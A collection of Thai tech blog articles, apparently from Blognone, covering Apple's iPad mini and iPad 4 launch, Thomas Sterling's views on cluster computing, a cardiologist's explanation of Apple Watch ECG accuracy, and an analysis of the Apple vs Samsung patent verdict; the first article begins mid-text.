ไว้สำหรับกะประมาณครับ สิ่งที่แอปเปิลชูเป็นจุดขายของ iPad mini มีอยู่สามอย่างด้วยกัน - น้ำหนักที่เบาและความบาง - ขนาดของจอที่เล็กกำลังดี แต่ใหญ่กว่า 7" - ขนาดที่กำลังพอดีมือ (ในงาน Phil ถือโชว์ด้วยมือเดียว) - ราคาที่ถูกลง คำถามคืองานหลัก (key tasks) ที่สามารถทำงานบน iPad mini ได้คืออะไร? ผมคิดว่างานที่สามารถทำบนจอขนาด 7.9" ได้ดีที่สุดคือการใช้ด้านความบันเทิง โดยเฉพาะการใช้สังคมออนไลน์, อ่านฟีดจากสำนักข่าว, หรือเข้าเว็บทั่วไป และในขณะเดียวกัน iPad ขนาด 9.7" ก็จะยังคงตีตลาดผู้ที่ต้องการทำงานเกี่ยวกับเอกสาร หรือใช้งานโปรแกรมสำนักงานบน iPad (สังเกตได้จากในงานไม่มีการโชว์โปรแกรมชุด iWork บน iPad mini เลย) ถึงแม้เราจะไม่เคยบ่นว่า Galaxy Tab 7 เล็กเกินไป แต่ผมว่าแอปเปิลคิดถูกที่ออกแท็บเล็ตขนาดเท่านี้มา (มีอีกวิธีหนึ่งคือการแบ่งรุ่นขนาดจอย่อยไปอีก – แต่นี่คือแอปเปิล) ในขณะเดียวกัน iPad ก็เป็นแท็บเล็ตแบรนด์เนมราคา ~10,000 บาทที่มีจอขนาดใหญ่ที่สุด ซึ่งเมื่อเทียบกับ Nexus 7 รุ่น 16GB ที่ขายในไทยด้วยราคา 9,900 บาท ผมเชื่อว่ามีหลายคนที่พร้อมเพิ่มเงินอีกไม่กี่บาทเพื่อแลกกับจอที่ใหญ่ขึ้นและ "แบรนด์แอปเปิล" ถ้าใครดู Keynote จะเห็นว่าในงานมีการนำ iPad mini มาเทียบกับ Nexus 7 ในด้านต่างๆ ทั้งขนาด, น้ำหนัก และหน้าจอ ซึ่งแอปเปิลทำการบ้านมาดีมาก เพราะตัวเครื่องนั้นกว้างกว่า Nexus 7 แค่ 14.7mm (iPad mini 134.7mm – Nexus 7 120mm) แต่สามารถใส่หน้าจอที่ใหญ่กว่า และน้ำหนักที่เบากว่ากัน 36g ครับ สรุปผมมองว่าการที่แอปเปิลนำ iPad mini ลงสู่ตลาดนั้น เพื่อตีตลาดแท็บเล็ตที่มีราคาถูกและจอเล็กลง และ[เมื่อมีข่าวว่า Google จะเลิกขาย Nexus 7 รุ่น 8GB ($199)](http://www.droid-life.com/2012/10/23/8gb-nexus-7-out-of-stock-at-google-play-store-32gb-version-incoming/) ผมคิดว่า iPad mini สามารถที่จะเบียดตลาดของ Nexus 7 ได้ครับ ### iPad 4 – อายุของความใหม่ที่สั้นลง สิ่งที่น่าสนใจที่สุดของการเปิดตัว iPad 4 ไม่ใช่สเปก, หน้าตา หรือสิ่งอื่นใด แต่เป็นช่วง life cycle ที่สั้นลงมาก ย้อนไปตั้งแต่ปี 2010 iPad แต่ละรุ่นเปิดตัวในวันที่ดังนี้ - iPad 1: 3 เมษายน 2010 - iPad 2: 11 มีนาคม 2011 - iPad 3: 16 มีนาคม 2012 - iPad 4: 23 ตุลาคม 2012 อายุความเป็นสินค้าตัวใหม่ที่สุดของแอปเปิล (life cycle) ของสินค้าตระกูล iPad/iPhone นั้นอยู่ที่ประมาณ 1 ปี ทว่างานเปิดตัว iPad 3 นั้นเพิ่งจัดไปในเดือนมีนาคมที่ผ่านมา (เจ็ดเดือนก่อน) ทำให้เกิดข้อสงสัยว่าเพราะเหตุใดแอปเปิลถึงตัด life cycle ของ iPad 3 เหลือเพียงเจ็ดเดือน เทคโนโลยีใหม่ใน iPad 4 จะพบว่ามีเพียงซีพียู A6X และ Lightning Port ที่ใหม่ขึ้นอย่างเห็นได้ชัด ส่วนที่เหลือคือรองรับเครือข่าย LTE มากขึ้น – ส่วนตัวมองว่าแทบไม่มีอะไรใหม่ สิ่งที่ตามมาคือเสียงก่นด่าของลูกค้าที่เพิ่งซื้อ iPad 3 และกลายเป็นของตกรุ่นในระยะเวลาไม่ถึงหนึ่งปี ต่างจากแนวทางของแอปเปิลแต่ก่อนที่ life cycle ของผลิตภัณฑ์ค่อนข้างนานเมื่อเทียบกับบริษัทอื่น ขณะทุกคนน่าจะกังวลในเวลานี้คืออายุของผลิตภัณฑ์ตัวใหม่ๆ ที่สั้นลงอย่างเห็นได้ชัด – ไม่แน่ว่าแอปเปิลอาจนึกอุตริเปิดตัว iPhone ตัวต่อไปในไตรมาสแรกของปีหน้าก็เป็นได้! ผมไม่เห็นด้วยกับแนวทางนี้ เพราะเท่ากับเป็นการ "ถีบ" ผลิตภัณฑ์เก่า (ที่ยังไม่เก่า) ให้ตกเหวเป็นผลิตภัณฑ์ "เก่าตามวิธีการแบ่งรุ่น" ในทันที (ไม่นับอัพเดตซอฟท์แวร์ที่เแอปเปิลทำได้ดีกว่าผู้ผลิตรายอื่น) ส่วนตัวมองว่าหลังจากนี้ต่อไปความคิดที่ว่า "ซื้อผลิตภัณฑ์แอปเปิลเก่าเร็ว" จะมีเยอะขึ้น (โดยเฉพาะกับผู้ถือครอง iPad 3) หาเป็นแบบนี้ไปนานๆ นั่นหมายถึงแอปเปิลกำลังสูญเสียฐานลูกค้าที่ยอมจ่ายแพงเพื่อให้ได้ใช้นานๆ และหากยังเป็นอย่างนี้ต่อไปผมเชื่อว่าลูกค้าพร้อมจะย้ายไปใช้สินค้ายี่ห้ออื่นที่ถูกกว่า, ได้สเปคแรงกว่า และตกรุ่นช้ากว่า (ยกเว้น zealots อย่างเหนียวแน่นที่ให้ตายก็ไม่มีทางย้ายค่าย!) ผมเชื่อวา่หากแอปเปิลแอบอัพเดตเงียบๆ แบบตอนที่อัพเดตชิปภายใน iPad 2 จะไม่มีกระแสด้านลบมากเท่านี้ครับ ### สรุป หลังจากงานคืนนี้ผมเห็นแนวทางใหม่ของแอปเปิลอยู่สองทาง ได้แก่ - การพยายามตีตลาดลูกค้าให้มากขึ้น ตามกระแสที่ได้รับความนิยม และ - การเปิดตัวของใหม่ ทำผลิตภัณฑ์ไม่เก่าให้กลายเป็นของเก่าเร็วขึ้น หลังจากนี้เราอาจเห็นแอปเปิลทำตลาดแบบผู้ผลิตหลายๆ ราย (ซอยรุ่นให้เยอะขึ้น อายุความใหม่สั้นลง) ซึ่งส่วนตัวมองว่าแอปเปิลจะสูญเสียความเป็น "แอปเปิล" ไปหากทำแบบนี้ เราต่างเห็นนักวิเคระห์บอกว่าแอปเปิลมีระบบจัดการที่ดีมาก ขายของน้อยรุ่น คนซื้อเยอะและพอใจ ได้กำไรดี – แถมบอกด้วยว่าหลายบริษัทควรใช้วิธีแบบนี้มากกว่าซอยรุ่นเยอะๆ ให้ตรงใจคนมากที่สุด แต่ทุกอย่างตรงกันข้าม แอปเปิลเลือกที่จะซอยรุ่นให้เยอะขึ้น และลด life cycle ของผลิตภัณฑ์ให้สั้นลงเกือบครึ่ง! วินาทีนี้หลายคนเริ่มออกมาฟันธงอนาคตของแอปเปิลกันแล้ว ซึ่งจะแม่นหรือไม่ก็คงไม่มีใครรู้ ถึงวันนั้นคงต้องรอดูอีกทีครับ
# ข้อคิดจากบิดาของแบวูฟล์คลัสเตอริ่งเทคโนโลยี วันนี้ผมไปงาน WTTC2008 ที่โรงแรมเซ็นจูรี่ปาร์คจัดโดยศูนย์ไทยกริดร่วมกับกระทรวงวิทย์ หน้าที่ตามเคยของผม คือคุยกับชาวบ้านและนักข่าว พยายามให้เขาเข้าใจว่า ประเทศไทยควรจะรับรู้ว่าเทคโนโลยีใหม่ๆมีอะไรกัน จะได้ไม่ตกรถไฟ ปีนี้เราเชิญ ดร.โทมัส เสตอริ่ง บิดาของแบวูฟล์คลัสเตอริ่งเทคโนโลยีมาได้ ท่านได้ทิ้งข้อคิดไว้หลายประการครับ ดร.โทมัส เสตอริ่ง เคยทำงานอยู่ NASA ที่ NASA Goddard Space Center ต่อมาย้ายไปที่ NASA JPL ปัจจุบันท่านทำงานที่ Louisiana State University ครับ ท่านผู้นี้เป็นผู้ให้กำเนิดเทคโนโลยีของคลัสเตอร์บนลินุกซ์ที่เรียกว่า [แบวูฟล์คลัสเตอริ่งเทคโนโลยี](https://www.beowulf.org/) (Beowulf Cluster) ตอนที่ท่านทำงานที่ NASA Goddard Space Center ท่านเป็นคนแรกๆที่มองเห็นศักยภาพของระบบพีซี โอเพนซอร์สและลินุกซ์ ว่าหากนำพีซีจำนวนมากมาต่อเชื่อมกันผ่านเครือข่ายความเร็วสูง และลงลีนุกซ์ ใครๆก็สร้างซูปเปอร์คอมพิวเตอร์ใช้เองได้ในราคาถูก ตอนนั้นในราวปี 1994 ไม่มีใครเชื่อเลย ทาง NASA เองก็ซื้อเครื่องซูปเปอร์คอมพิวเตอร์แพงๆ จาก CRAY และ SGI มาตลอด ดร.โทมัส เสตอริ่ง และทีมงานได้ทำ PC 486DX100 มีหน่วยความจำ 64 Mb มาต่อผ่าน Fast Ethernet Switch และนำโปรแกรมประยุกต์ต่างๆของ NASA มาทดลอง ปรากฎว่า เร็วพอๆ กับเครื่องซูปเปอร์คอมพิวเตอร์แพงๆ ที่มีทำให้คนเริ่มเปลี่ยนความคิด เมื่อทาง NASA ยอมรับเลยทำให้เทคโนโลยีคลัสเตอร์แพร่ออกไปและเปลี่ยนแปลงโลกครับ ปัจจุบันถ้าเราดูที่รายชื่อ Top 500 คอมพิวเตอร์ที่เร็วที่สุดในโลก ท่านจะพบว่าเป็นคลัสเตอร์เกือบทั้งหมด ผมได้มีโอกาสช่วยเป็นล่ามแปลคำสัมภาษณ์ของดร.โทมัส เสตอริ่ง ให้สื่อมวลชนฟัง มีหลายประเด็นที่น่าสนใจครับ ขอเล่าสู่กันฟังดังนี้ ในเรื่องเทคโนโลยีของซูปเปอร์คอมพิวเตอร์ ท่านบอกว่าเรามีปัญหาใหญ่ทั้งโลก นั่น คือ ระบบปฏิบัติการที่ใช้ ตัวไมโครโปรเซสเซอร์ที่ใช้ ภาษาโปรแกรมที่ใช้ เป็นเทคโนโลยีที่ออกแบบมาเมื่อ 30 ปีก่อน แต่ไม่มีใครยอมเปลี่ยน ทำให้ความก้าวหน้าของวงการนี้เป็นกราฟเส้นตรง ในขณะที่เทคโนโลยีพื้นฐานอื่นๆ ที่เกี่ยวข้องเช่นการทำชิปนั้นดีขึ้นเป็น exponential ผลคือ เราติดในวิกฤติอย่างรุนแรง ช่องว่างระหว่างเทคโนโลยีที่ใช้สร้างคอมพิวเตอร์ได้กับความก้าวหน้าของเทคโนโลยีพื้นฐานกว้างขึ้นอย่างรวดเร็วมาก ทำให้เราได้คอมพิวเตอร์ที่ช้ากว่าที่ควรจะได้มาก ความเร็วในการทำงานของคอมพิวเตอร์เริ่มอยู่ตัว ความเร็วของซีพียูคอร์จะค่อนข้างคงที่ ขีดจำกัดนี้ทำให้การขยายตัวของฮาร์ดแวร์จะออกทาง Horizontal คือ เพิ่มจำนวนคอร์ไปเรื่อยๆ อย่างรวดเร็ว อย่างไรก็ตามเรายังมีแค่ภาษาโปรแกรมและเทคนิคที่พัฒนาโปรแกรมแบบขนานให้ทำงานพร้อมกันได้ไม่กี่สิบหรือไม่กี่ร้อยงาน ท่านบอกว่าเราต้องการแนวทางที่ทำให้เกิดการพัฒนาโปรแกรมแบบขนาน ที่ทำงานพร้อมกันได้นับพันล้านงานจึงจะดึงศักยภาพของคอมพิวเตอร์ในอนาคตออกมาได้ อันที่จริง ดร.โทมัส เสตอริ่ง กำลังทำวิจัยเรื่องนี้อย่างหนักอยู่ โดยใช้เทคโนโลยีแบบ message driven architecture เป็นหลัก การออกแบบในวงการคอมพิวเตอร์ยังสามารถปรับปรุงได้อีกมาก ท่านมองว่าเรามักเน้นการต่อยอดเทคโนโลยีเดิมโดยการเพิ่มความซับซ้อนไปเรื่อย ทำให้บริษัทมีภาระในการบำรุง รักษาซอฟต์แวร์สูงมาก นอกจากนั้น การทำงานยังมีขีดจำกัดมาก ท่านมองว่าการออกแบบคอมพิวเตอร์แห่งอนาคตจะเกิดจากการสร้างระบบที่ทำงานแบบง่ายมากๆ จำนวนมหาศาลมาเชื่อมโยงกัน และโปรแกรมประยุกต์จะทำงานแบบขนานอย่างมหาศาลบนระบบนั้น ถ้าเราดูร่างกายที่ซับซ้อนของมนุษย์ ก็ประกอบด้วยเซลล์ง่ายๆ จำนวนมหาศาลที่เชื่อมกัน และทำงานพร้อมกัน ตอนนี้เรื่องเหล่านี้ก็ยังไม่มีแนวคิดที่ได้ผลจริงจัง สำหรับประเทศไทย ท่านให่้แนวคิดว่า เรามีโอกาสในการแข่งกับคนทั้งโลกครับ เนื่องจากเทคโนโลยีในโลกไม่คงที่ ทุกช่วงเวลาหนึ่งเมื่อเทคโนโลยีเปลี่ยนครั้งใหญ่ ทุกคนต้องหยุดเรียนรู้ของใหม่หมด ดังนั้นประเทศไทยก็จะมีความสามารถพอกับทุกที่เนื่องจากทุกคนก็เพิ่งเริ่มใหม่หมด ผมได้เห็นความจริงข้อนี้จากโครงการกริด เนื่องจากเรามีขีดความสามารถในระดับเอเชียได้ปัจจัยหนึ่ง คือ ทุกคนเพิ่งเริ่มเหมือนเราหมด ท่านพูดถึง พี่น้องตระกูล Wright ที่มีกันสองคนก็สร้างเครื่องบินได้ เพราะทุกคนก็เริ่มที่จุดนั้นหมด อย่างไรก็ตามประเทศไทยต้องการ 1. Education ต้องสร้างคนที่มีความรู้เรื่องนี้ที่มีคุณภาพออกสู่สังคมมากๆ 2. Innovation เนื่องจากเราที่เงินน้อย ต้องตั้ง special research lab รวมคนมีฝีมือ มาทำงานร่วมกันโดยมีการสนับสนุนอย่างเพียงพอ 3. Product ต้องเลือก งานหนึ่งชิ้นมาทำ national product ที่เราภูมิใจได้และต่อยอดได้ สุดท้ายท่านแถมว่า ทำการใหญ่ต้องมี วิสัยทัศน์ (vision) ชัดเจนว่าเทคโนโลยีใดกำลังมา และ มีแรงใจ (will) ที่จะทุ่มกำลังทำให้บรรลุผลให้ๆได้ อือม ผมว่าตรงนี้แหละยากที่สุดสำหรับประเทศไทยเรา เราเป็นสมาชิกระดับก่อตั้ง NATO เลยครับ (NATO = NO ACTION TALK ONLY)
# ไขข้อสงสัยการตรวจคลื่นไฟฟ้าหัวใจ (ECG) บน Apple Watch โดยแพทย์ รพ. สมิติเวช เมื่อกลางเดือนที่ผ่านมา แอปเปิลอัพเดตผลิตภัณฑ์ฮาร์ดแวร์ Apple Watch Series 4 ที่มีไฮไลท์คือการตรวจวัดคลื่นไฟฟ้าหัวใจ (Electrocardiogram - ECG/EKG) สามารถตรวจหาความผิดปกติของการเต้นของหัวใจได้สร้างความฮือฮาและความตื่นตัวในแง่ของการมี ECG บนอุปกรณ์สวมใส่ แต่การมาถึงของ ECG บน Apple Watch ยังมีคำถามตามมามากมาย ทั้งความสามารถว่าอุปกรณ์เหล่านี้ให้ผลเทียบเท่าอุปกรณ์ทางการแพทย์ที่ใช้ในสถานพยาบาลหรือไม่ ความน่าเชื่อถือว่าแม่นยำแค่ไหน ไปจนถึงประเด็นว่าเราควรจะเชื่อผลการตรวจ ECG บนอุปกรณ์สวมใส่มากน้อยแค่ไหน Blognone จึงขอสัมภาษณ์ **น.พ. กฤษฎา วิไลวัฒนากร** อายุรแพทย์โรคหัวใจ (Cardiologist) โรงพยาบาลสมิติเวช สุขุมวิท ผู้เชี่ยวชาญด้านการตรวจคลื่นไฟฟ้าหัวใจโดยตรง เพื่อช่วยอธิบายและให้ความกระจ่างจากคำถามข้างต้นครับ ### หลักการพื้นฐานของการตรวจคลื่นไฟฟ้าหัวใจ 12 จุด คุณหมอกฤษฎาอธิบายหลักการพื้นฐานว่า การเต้นของกล้ามหัวใจจะมีการสร้างกระแสไฟฟ้าขึ้นมาเป็นปกติ การตรวจคลื่นไฟฟ้าทำให้ทราบว่า หัวใจเต้นเป็นจังหวะปกติหรือไม่ สม่ำเสมอหรือไม่ โดยจะแสดงออกมาในลักษณะของเวกเตอร์ไฟฟ้า และเป็นแนวทางให้กับแพทย์ในการวินิจฉัยว่าอาจเกิดโรคหรือความผิดปกติอะไรขึ้นได้บ้าง การตรวจคลื่นไฟฟ้าหัวใจตามมาตรฐานที่โรงพยาบาลจะติดตัววัดสัญญาณชีพจร (marker) บนร่างกายทั้งหมด 10 จุด (12-lead) เพื่อให้เห็นการวิ่งของกระแสไฟฟ้าทั้ง 4 ห้องหัวใจ และตำแหน่งของตัวตรวจจับแต่ละจุดก็ทำหน้าที่วัดการวิ่งของกระแสไฟฟ้าจากจุดหนึ่งไปอีกจุดหนึ่ง ### อุปกรณ์ ECG สำหรับผู้บริโภคเป็นการวัดแบบจุดเดียว (single-lead) การตรวจ ECG บนอุปกรณ์ที่วางจำหน่ายโดยทั่วไป (Portable/Consumer ECG) จะเป็นแบบ single-lead คือวัดกระแสไฟฟ้าได้ทางเดียว จากมือขวาไปมือซ้ายเท่านั้น ดังนั้นการตรวจจะไม่ได้ภาพรวมของหัวใจทั้งหมด ช่วยบอกได้แค่ว่าจังหวะการเต้นปกติหรือไม่ มีเต้นผิดจังหวะหรือเปล่า ส่วนอาการผิดปกติที่ ECG แบบ single-lead บ่งบอกได้คืออาการหัวใจเต้นพริ้วหรือเต้นระริก (Atrial Fibrillation) ที่ผนังหัวใจห้องบนเต้นเร็วกว่าหัวใจห้องล่าง ทำให้จังหวะการเต้นของชีพจรไม่สม่ำเสมอ (irregular) ซึ่งการตรวจ Atrial Fibrillation นี้ทำได้เฉพาะการตรวจคลื่นไฟฟ้าเท่านั้น การตรวจจับจากจังหวะการเต้นของหัวใจแบบเดิม อย่างบนสมาร์ทวอชหลายเจ้าที่ไม่มี ECG ทำไม่ได้แน่นอน ### สิ่งที่ต้องระวัง: False Positive กับความแม่นยำของอุปกรณ์ การตรวจอาการหัวใจเต้นพริ้ว (Atrial Fibrillation) บนอุปกรณ์สวมใส่เหล่านี้ ถึงแม้จะมีประโยชน์ในแง่ความสะดวก และช่วยผู้ป่วยให้รู้ตัวเองได้ไวขึ้นก็จริง แต่ยังไม่สามารถใช้เป็นเครื่องมือวินิจฉัยโรคเต็มรูปแบบได้ทีเดียว เพราะมีโอกาสเกิดผลบวกลวงหรือ False Positive ได้ กล่าวคือ สมาร์ทวอทช์อาจตรวจพบว่ามีอาการหัวใจเต้นพริ้ว แต่ความจริงคือไม่ได้เป็นอะไร คุณหมอกฤษฎาอธิบายว่า ปกติหัวใจอาจเกิดอาการเต้นแทรกหรือมีการสร้างกระแสไฟฟ้าแทรกขึ้นมาเล็กน้อย นานๆ อาจจะมีครั้งหนึ่ง แต่อาจทำให้เครื่องตรวจวัดออกมาแล้วพบว่าช่องไฟของจังหวะการเต้นมีความผิดปกติและระบุว่าเป็นอาการของ Atrial Fibrillation ก็ได้ ทว่าเมื่อมาตรวจแบบ 12-lead กับแพทย์แล้วไม่พบความผิดปกติอะไร กลายเป็นผลบวกลวงไป ซึ่งก็อาจสร้างความกังวลกับผู้ป่วยหรือผู้ใช้งานที่เชื่อเทคโนโลยีจนเกินไปได้อีก ว่าทำไมผลบนอุปกรณ์เหล่านี้ถึงไม่ตรงกับที่โรงพยาบาล ### คำแนะนำในการใช้งาน ECG บนนาฬิกาหรืออุปกรณ์แบบพกพา คุณหมอยอมรับว่าอุปกรณ์เหล่านี้มีประโยชน์ ช่วยให้ผู้ใช้ตรวจสอบตัวเองได้ดีมากขึ้น เมื่อพบปัญหาก็สามารถมาพบแพทย์ได้เร็วขึ้น แต่ข้อแนะนำคืออย่าไปยึดติดหรือกังวลกับมันมาก อุปกรณ์ชิ้นเดียวไม่สามารถบ่งบอกโรคได้ทั้งหมด หากมีปัญหาหรืออาการผิดปกติควรมาพบแพทย์ เพื่อซักประวัติหรือตรวจกับเครื่องมือมาตรฐานอื่นๆ เพิ่มเติม ส่วนการตรวจคลื่นไฟฟ้าหัวใจแบบ 12 lead ก็ควรตรวจเป็นประจำไปพร้อมๆ กับการตรวจร่างกายประจำปี และแนะนำว่าสำหรับผู้ที่มาอายุมากกว่า 45 ปีขึ้นไป ควรเข้ามาตรวจเช็คด้วยเครื่องวัด ECG ในโรงพยาบาล ### อย่าลืมว่า ECG บน Apple Watch ยังไม่เปิดให้ใช้ สำหรับ Apple Watch Series 4 บริษัทแอปเปิลระบุว่า ณ ตอนนี้ใช้ได้เฉพาะในสหรัฐอเมริกาเท่านั้น (แถมเปิดให้ใช้ปลายปีด้วย) เพราะได้รับการรับรองในกลุ่ม Class II จาก FDA (อย. สหรัฐ) แค่ที่เดียว โดยในประเทศไทย เมื่อวางจำหน่ายฟีเจอร์ ECG จะถูกปิดไว้เป็นค่าดีฟอลต์ หากจะเปลี่ยนจาก Series 3 ไปเป็น Series 4 เพราะหวังฟีเจอร์นี้อาจจะต้องผิดหวัง คงต้องรอ อย. ของไทยรับรองและอนุญาตต่อไป
# บทวิเคราะห์คดีแอปเปิล vs ซัมซุง Blognone ลงข่าวเกี่ยวกับคดีนี้ไปเยอะมากๆ แล้ว (ขอบคุณทุกท่านที่มาร่วมเขียนด้วย) รายละเอียดย้อนกลับไปอ่านกันเองในข่าวเก่านะครับ บทความนี้จะเน้นไปที่ผลกระทบถัดจากนี้ต่อทั้งสองบริษัท และวงการไอทีในภาพรวมครับ เนื่องจากประเด็นมีเยอะ ผมจะใช้วิธีเขียนแบบ bullet เพื่อไม่ให้ประเด็นตีกัน ## กระบวนการของคดี - ถ้าวัดกันตามกระบวนการจริงๆ คดียังไม่จบ [ความคืบหน้าล่าสุดขณะที่เขียน](https://www.blognone.com/node/35391)เป็นการลงมติของคณะลูกขุน (ตามกระบวนการยุติธรรมของสหรัฐ) หลังจากนี้ไปจะยังมีขั้นตอนของศาล-ผู้พิพากษาที่จะพิจารณามติของคณะลูกขุนอีกทีหนึ่ง และถ้าศาลมีความเห็นตามคณะลูกขุน ก็มีประเด็นเรื่องค่าเสียหายและการบังคับคดีที่ต้องพิจารณาอีกด้วย (ศาลนัดช่วงปลายเดือนกันยายน ระหว่างนี้ก็สงบศึกรอไปก่อนเดือนนึง) - ซัมซุงยังมีสิทธิ์ยื่นอุทธรณ์ และตามข่าวที่ออกมาซัมซุงก็แสดงตัวชัดเจนว่าเตรียมยื่นอุทธรณ์ ([BBC](http://www.bbc.com/news/technology-19381096)) ดังนั้นคดีจะลากยาวออกไปอีก (ซึ่งเป็นประโยชน์ต่อซัมซุงมากกว่าแอปเปิล) ## การตัดสินของคณะลูกขุน อันนี้เป็นความเห็นของผมเอง ซึ่งคงไม่ตรงกับหลายคนและก็คงตรงกับบางคน - ถ้าถามว่าซัมซุงลอกแอปเปิลหรือเปล่า คำตอบของผมคือ "ลอก" ชัดเจนแน่นอน พูดได้เต็มปากว่าลอก ดังนั้นซัมซุงแพ้ไม่น่าแปลกใจ - แต่สิ่งที่น่าแปลกใจคือสิทธิบัตรที่ซัมซุงฟ้องกลับแอปเปิล ลูกขุนกลับตัดสินว่าแอปเปิลไม่ละเมิดทั้งหมด ซึ่งต่างไปจาก[กรณีของเกาหลีใต้](https://www.blognone.com/node/35372)อยู่มาก ผมยังไม่ได้อ่านรายละเอียดของเอกสารจากคณะลูกขุน ยังวิจารณ์ไม่ได้ว่าปัจจัยหรือเหตุผลของคำตัดสินคืออะไร ## ผลกระทบต่อซัมซุง - ต่อให้ศาลตัดสินว่าซัมซุงแพ้คดี มันอาจมีผลกระทบในเชิงลบต่อซัมซุงไม่เยอะอย่างที่คิด (ถ้าไม่นับเรื่องเสียหน้า-ภาพลักษณ์) เพราะค่าเสียหาย 1 พันล้านดอลลาร์ ถือว่าจิ๊บมากสำหรับบริษัทอย่างซัมซุงที่มีกำไร 18.3 พันล้านดอลลาร์ต่อปี (ตัวเลขของปี 2011) - ส่วนการสั่ง "ห้ามขายมือถือของซัมซุงในสหรัฐ" (ถ้าศาลสั่งบังคับคดีแบบนี้) ก็ไม่มีผลอะไรมากนัก เพราะช่องว่างของกระบวนการกฎหมายที่ล่าช้า ไล่ไม่ทันรอบของการออกรุ่นมือถือที่เร็วกว่ามาก แถมกรณีของซัมซุงคนแถวนี้คงรู้อยู่แล้วว่าซอยรุ่นย่อย ออกรุ่นอัพเกรดบ่อยแค่ไหน (ซึ่งในแง่ผลิตภัณฑ์คือคนละตัวกัน) ต่อให้ตัวเก่าถูกสั่งห้ามขาย ผมเชื่อว่าบางทีคำสั่งศาลยังไม่ออก เราก็เห็นรุ่นใหม่ออกมาแล้วด้วยซ้ำ - ในระยะหลังๆ เราเริ่มเห็นซัมซุงฉีกแนวทางการออกแบบผลิตภัณฑ์ของตัวเองให้ต่างไปจากแอปเปิลมากขึ้น (ซึ่งต่างไปจากสถานการณ์ในปี 2010 มาก) เมื่อบวกกับผลของคดีนี้จะทำให้ซัมซุงมีความเสี่ยงจะโดนฟ้องในลักษณะเดียวกันน้อยลง - ส่วนที่กระทบจริงๆ คงเป็นสิทธิบัตรบางตัวที่ครอบคลุมการทำงานของซอฟต์แวร์ ซึ่งตรงนี้มันมีวิธีเลี่ยงเยอะ เช่น ถอดฟีเจอร์นั้นๆ ออกไปก่อน (HTC ใช้วิธีนี้) แล้วเพิ่มกลับเข้ามาแบบเงียบๆ ผ่านแอพหรือเลี่ยงไปใช้วิธีอื่นที่ไม่เหมือนกันเสียทีเดียว ## ผลกระทบต่อแอปเปิล - เอาเข้าจริงแล้ว นอกจาก "ชัยชนะ" แอปเปิลแทบไม่ได้ประโยชน์อะไรจากคดีนี้มากนัก - เงิน 1 พันล้านดอลลาร์ ก็ถือว่าจิ๊บมากสำหรับบริษัทที่มีกำไร 26 พันล้านดอลลาร์แบบแอปเปิล (ตัวเลขปี 2011) - เป้าหมายหลักของแอปเปิลคือสกัดความร้อนแรงของซัมซุงในตลาดสมาร์ทโฟน (ที่แซงเป็นเบอร์หนึ่งของโลกไปหลายไตรมาสแล้ว) ซึ่งคดีนี้คงช่วยให้ซัมซุงสะดุดเล็กๆ ในอเมริกาเท่านั้น โลกมือถือยังมีตลาดอื่นๆ อีกมาก และอย่างที่เขียนไปแล้วว่าแบรนด์ซัมซุงติดตลาดไปแล้ว เมื่อซัมซุงออกมือถือรุ่นใหม่ๆ มาอีก มันก็ยังขายดีอยู่ ผู้บริโภคไม่ได้เลิกซื้อมือถือซัมซุงเพราะแพ้คดีสักหน่อย ## ผลกระทบต่อวงการสมาร์ทโฟน - อย่าลืมว่าคดีนี้เกิดขึ้นในสหรัฐ ครอบคลุมเฉพาะมือถือที่วางขายในสหรัฐเท่านั้น - ตัวระบบปฏิบัติการ Android อาจต้องปรับเปลี่ยนฟีเจอร์บางอันที่อยู่ในสิทธิบัตรออก โดยหลักแล้วคงเป็นเรื่อง UI ซึ่งผมคิดว่าในทางปฏิบัติมีวิธีเลี่ยงได้เยอะ และแน่นอนว่าไม่กระทบกับเวอร์ชัน international แต่อย่างใด (เราจะเห็นการแยกรุ่นสินค้าเวอร์ชันสหรัฐ-นอกสหรัฐมากขึ้นเรื่อยๆ จากคดีนี้) - ผู้ผลิตมือถือ Android บางรายอาจยอมจ่ายเงินค่าใช้งานสิทธิบัตรให้กับแอปเปิลบ้าง เพื่อป้องกันปัญหาถูกฟ้องร้อง - แต่สิ่งที่น่าจะเกิดมากกว่าคือ การจับมือผนึกกำลังระหว่างผู้ผลิตมือถือ Android แล้วฟ้องแอปเปิลด้วยสิทธิบัตรที่มีอยู่ในมือ เหมือนกับที่[กูเกิลสั่งโมโตโรลาฟ้องแอปเปิลไปแล้ว](http://www.blognone.com/node/35183) และเป็นไปได้เหมือนกันว่าเราอาจได้เห็นกูเกิลฟ้องแอปเปิลตรงๆ หรือกลับทิศกันก็ได้ - โลกสมาร์ทโฟนจะอยู่ภายใต้ "สงครามนิวเคลียร์" อย่างที่สตีฟ จ็อบส์พูดเอาไว้ - ผมไม่เห็นด้วยกับความเห็นว่า [Windows Phone ได้ประโยชน์จากคดีนี้](https://www.blognone.com/node/35410) เพราะผู้ผลิตมือถืออาจหันมาทำ Windows Phone เพิ่มขึ้นบ้างเพื่อลดความเสี่ยง แต่อย่างที่เขียนไปแล้วว่าตลาดไม่สนใจเรื่องนี้อยู่แล้ว สุดท้ายมันขึ้นกับไมโครซอฟท์เองมากกว่าว่าจะสร้างผลิตภัณฑ์ที่ดึงดูดได้มากน้อยแค่ไหน ## สรุป - แอปเปิลชนะคดี แต่หยุด Android ไม่ได้อย่างที่หวัง อาจเรียกว่าแทบไม่กระทบเลยด้วยซ้ำ (ออก iPad Mini มายังมีผลมากกว่ามาก) - ซัมซุงจะใช้วิธีซื้อเวลาไปเรื่อยๆ ผ่านการอุทธรณ์ เพื่อลดผลกระทบจากการบังคับคดีต่อผลิตภัณฑ์ในปัจจุบัน - ถ้าให้สรุปภาพรวมของคดี คงต้องใช้คำว่า "แอปเปิลชนะอย่างถูกต้อง บนระบบสิทธิบัตรที่ผิดเพี้ยน" คือในแง่กฎหมายแล้ว แอปเปิลไม่ได้ทำอะไรผิดเลย และใช้ประโยชน์จากระบบสิทธิบัตรของสหรัฐได้เต็มที่มากๆ - แต่ระบบสิทธิบัตรของสหรัฐเองก็มีปัญหามากเช่นกัน ซึ่งเป็นเรื่องที่ต้องแก้ไขในระยะยาว และความดังของคดีนี้น่าจะช่วยให้สาธารณชนเข้าใจปัญหาของระบบสิทธิบัตรมากขึ้นเยอะ - การแก้ระบบสิทธิบัตรไม่ใช่เรื่องง่าย เพราะมีคนเสียประโยชน์เยอะแน่นอน (เจ้าของสิทธิบัตรเดิมๆ ที่จดไปแล้วทั้งหมด) ซึ่งภายใต้ระบบสิทธิบัตรแบบปัจจุบัน อนาคตที่เป็นไปได้มากที่สุดก็คงเป็นการไล่ฟ้องกันเละเทะ 